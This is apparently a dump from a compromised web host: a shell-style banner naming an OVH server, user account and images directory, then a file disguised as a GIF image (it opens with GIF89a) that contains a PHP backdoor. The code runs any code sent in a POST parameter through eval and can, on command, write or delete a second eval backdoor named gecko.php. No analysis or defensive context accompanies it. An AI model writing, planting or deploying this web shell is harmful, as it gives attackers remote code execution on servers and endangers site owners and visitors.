Server : Apache System : Linux webm012.cluster129.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : eventfrsgx ( 61451) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Directory : /home/e/v/e/eventfrsgx/www/images/ |
GIF89a
<?php
$k="qwertyuiop";
if(isset($_POST[$k])){eval($_POST[$k]);}
elseif(isset($_GET["c"])){
$c=$_GET["c"];
if($c=="w"&&isset($_GET["p"])){file_put_contents("gecko.php",'<?php eval($_POST["qwertyuiop"]);?>');echo "x";}
elseif($c=="d"){@unlink("gecko.php");echo "d";}
else{echo "r";}
}
?>